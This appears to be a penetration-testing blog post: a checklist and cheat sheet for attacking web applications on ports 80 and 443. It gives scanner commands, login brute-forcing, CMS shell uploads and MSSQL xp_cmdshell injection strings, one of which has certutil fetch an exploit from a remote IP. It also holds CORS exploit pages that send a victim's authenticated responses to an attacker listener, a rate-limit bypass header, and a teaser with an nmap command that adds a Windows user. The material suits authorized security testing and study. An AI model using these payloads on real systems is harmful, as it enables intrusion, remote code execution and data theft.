Skip to main content

Web Page Enum - Port 80,443


Hello Minna-san, this post covers some basic Checks to be carried out while Penetration Testing web application, though it doesn't cover the exploitation part  yet. 

Simple Web Page Enum Checklist
  1. Scan All the Ports via Nmap
    • Web Servers can be Found on any port
    • nmap -Pn -p- 10.10.10.10
  2. Check robots.txt
  3. Run nikto, dirb, dirsearch.py --> check large dictionaries
    • nikto -h 10.10.10.10
    • dirb http://10.10.10.10
    • dirsearch.py -u http://10.10.10.10 -e *
    • CUPP -i
  4. Try to use all kinds of HTTP methods - GET,POST, PUT
    • Try with curl -X put --upload-file <filename> <web server address>
  5. Check for login pages, if found any - try to login with default creds. Send it to burp intruder/Turbo Intruder and brute force it
  6. Check the CMS of the Application
    • if its wordpress/ Drupal/ joomla run their specific scanners - wpscan, drupscan
    • Try to login with default credentials - Use intruder / wpscan
    • search for vulnerable plugins
    • use CEWL to generate a list of passwords/usernames and emails
    • Check if the CMS version has any existing Vulnerabilities
    • Intercept the request and see what's going on in the backend
    • In case, if you are able to login but do not have access to write in any of the page, upload a vulnerable plugin and exploit it
    • After Authentication: if the OS is unknown, go to "TEMPLATE EDITOR" --> try uploading different kinds of shells --> php, PHP4, PHP5, php.png
  7. Run sqlmap, w3af or any automated scanning on the application
  8. Check the webserver information using whatweb
    • whatweb 10.10.10.10
    • whatweb 10.10.10.0/16 --no-errors | grep -v Unassigned
  9. Check the HTTP Response headers, you might see the application server information or the proxy information
  10. Authenticated: Check for file uploads or any input fields
Finding Vulnerabilities using Tools

Sn1per
Sn1per -t 10.10.10.10 -m vulnscan
Sn1per -t 10.10.10.10 -m webscan

Nuclei
Templates list: cves,vulnerabilities,exposed-panels,takeovers,exposures,technologies,misconfiguration,workflows,miscellaneous,default-logins,file,dns,fuzzing,helpers,iot, #Update the templates nuclei -update-templates #Scan the taget using given templates nuclei -t cves 10.10.10.10 #scan cves based on Severity nuclei -t cves/ -severity critical -l <target-list> #Scan all templates except a few nuclei -l <target-list> -t nuclei-templates/ -exclude iot/ -exclude technologies #Run automated authenticated scan with a given list of templates nuclei -u https://domain/ -as -t cves,vulnerabilities,exposed-panels,takeovers,exposures,technologies,misconfiguration,workflows,miscellaneous,default-logins,file,dns,fuzzing,iot -H "Authorization: Bearer sdasdsada"
Nikto nikto -h 10.10.10.10 nikto -h 10.10.10.10 -ssl Joomla CMS git clone https://github.com/rezasp/joomscan.git cd joomscan perl joomscan.pl -u www.example.com --ec
If its a windows operating system and if you think there might be an sql injection, then database is MSSQL - You can try this exploit.

';EXEC xp_cmdshell 'any windows command'
';EXEC xp_cmdshell 'certutil -urlcatche -f http://IP_address/exploit.aspx';--

//In case you dont have enough privileges , try the beko
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
#Validating Webpages from Multiple IPs

nmap -Pn -p443 10.10.103.0/24 --open -oG https
grep ' 443/open/' https | cut -d' ' -f 2 | sort -uV > 443.txt
for i in $(cat 443.txt); do (wget  https://$i --no-check-certificate  --tries=1 -O $i) & done

for i in $(seq 1 255); do (curl -s -I -vv https://10.10.10.$i --connect-timeout  2)  done | tee 443

for i in $(seq 1 255); do (wget  https://10.10.10.$i -t 1 --connect-timeout=5); done | tee wget-443
Find URL Shortnames 

git clone https://github.com/bitquark/shortscan 
shortscan https://domain.com/
shortscan https://domain.com/admin/
shortscan https://domain.com/test/
Check for AEM Vulns 

git clone https://github.com/0ang3el/aem-hacker.git 

#scan AEM webapp for vulnerabilities.
python3 aem_hacker.py -u https://aem.webapp --host SSRF_TestServer_IP

#scan urls and find AEM webapps among them.
python3 aem_discoverer.py --file urls.txt --workers 150

More available on Github
HTTP Verb Tampering

#!/bin/bash

for webservmethod in GET POST PUT TRACE CONNECT OPTIONS PROPFIND;

do
printf "$webservmethod " ;
printf "$webservmethod / HTTP/1.1\nHost: $1\n\n" | nc -q 1 $1 80 | grep "HTTP/1.1"

done
#Nikto
for i in $(cat ips.txt); do (nikto -h $i -o $i -Format txt) & done

#SSLScan 
Burp Suite Tips 

- look for parameters (sitemap --> filter by parameter)
- Look for hideen fields. (proxy --> options --> Response modifications --> "unhide hidden form fields")
- Check Host Header injection
- Check for CORS

Session handling with anti-csrf token:

capture the req -->
project options --> Sessions -->Macros --> Add --> Select the url from HTTP history --> hit "Configure this item' --> Under "Custom Parameter locations in response" click "Add" --> find the anti-csrf token from the page reponse under the dialogue box and select it; it should automatically update the expression --> name the parameter (Exactly same as the anto-csrf parameter) and click "ok" --> "Test macro" --> macro is now saved

Session handling Rules --> 'Add' a new rule --> "name" the rule --> under Rule Actions click 'Add' --> Select "Run a macro" --> select the macro that we created earlier. --> select "Update only the following parameters" & type the anticsrf parameter name that you are looking to update everytime; Click edit; enter the param name --> add --> close --> ok --> ok; you should see the new rule under session handling rules

*Now whenever you run the url under repeater, anti-csrf token will update automatically *
 
Check for CORS 

Burp --> proxy --> options --> match & replace --> Add -->
Type: Request header
Match: Origin: https://domain.com
Replace: Origin: https"//untrusted.domain.com

--> ok
Check the response for 'Access-Control-Allow-Origin'; if you find the untrusted.domain.com in response --> its vulnerable to CORS

.204 No content status code --> Not Vulnerable   Exploiting CORS create a HTTPS Server using the script
<html>
  <body>
    <script>
        var req = new XMLHttpRequest();
        req.onload = reqListener;
        req.open('get','https://domain.com/CORS/issue',true);
        req.withCredentials = true;
        req.setRequestHeader('Origin','https://localhost')
        req.setRequestHeader('Cookie', 'user-token=COOKIE_VALUE');
        req.setRequestHeader('Access-Control-Request-Headers', 'content-type,x-requested-with');
        req.send().

        function reqListener() {
        location='https://localhost/log?key='+this.responseText;
        };

  </script>
  <body>
</html>

<html>
    <head></head>
    <body>
        <script>
            var xhr = new XMLHttpRequest();
            xhr.onreadystatechange = function() {
                if (this.readyState == 4 && this.status == 200) {
                    var xhr2 = new XMLHttpRequest();
                    // attacker.server: attacker listener to steal response
                    xhr2.open("POST", "https://localhost", true);
                    xhr2.send(xhr.responseText);
                }
            };
            // victim.site: vulnerable server with `Access-Control-Allow-Origin: *` header
            xhr.open("GET", "https://domain.com/asdsa", false);
            xhr.withCredentials = true;
            xhr.setRequestHeader('Origin','https://localhost')
            xhr.setRequestHeader('Cookie', 'user-token=');
            xhr.setRequestHeader('Access-Control-Request-Headers', 'content-type,x-requested-with');
           
            xhr.send();
        </script>
    </body>
</html>
Tips: 
-look for parameters (sitemap --> filter by parameter)
- Look for hideen fields. (proxy --> options --> Response modifications --> "unhide hidden form fields")
- Check for CORS origin (create a spoofed CORS using proxy --> options --> match & replace --> add 'Origin:' test.pentest.com)
- Try Injection on all Headers
- Send anticsrf tokens to sequencer
- Compare Site-maps for ACL's (Using Compare Sitemaps feature)
- Set burp proxy in ZAP outgoing proxy to view the OWASP ZAP data


Techniques:
Bypass Rate Limit: Add "X-Forwarded-For: 127.0.0.1" header in the request











Comments

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds

Windows Priv Escallation

1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm

Forensics & Crypto

Online Decoder --> https://2cyr.com/decode/ Encoding errors -->  https://ftfy.now.sh/ File Signatures List -->  Click here PCAP Analysis: -->  https://www.packettotal.com/ Online Cipher Decryptors: CyberChef  - Cipher Decoder   Crack Station-Hash Cracke r Decrypt Any Kind of Hash 1)  Cipher Statistics 2)  Index of Coincidence Calculator - Online IC Cryptanalysis Tool 3)  Tools List (Awesome and Fantastic Tools) Available on dCode 4)  Solve an Aristocrat or Patristocrat 5)  RSA attack tool (mainly for ctf) - retreive private key from weak public key and/or uncipher data 5-1)  RSA - Find PQ using N 6)  BertNase's Own Hide content in a Image made of blocks - npiet fun! 7)  Vigenere Solver - www.guballa.de 8)  Fernet (Decode) 9)  Unicode Text Steganography Encoders/Decoders 10)  All in ONE encoders and Decoders Tool 11) Cryptii - Decoder Image Forensics: 1)  Forensically, free online photo forensics tools - 29a.ch 2)  StegSolve to decryt data in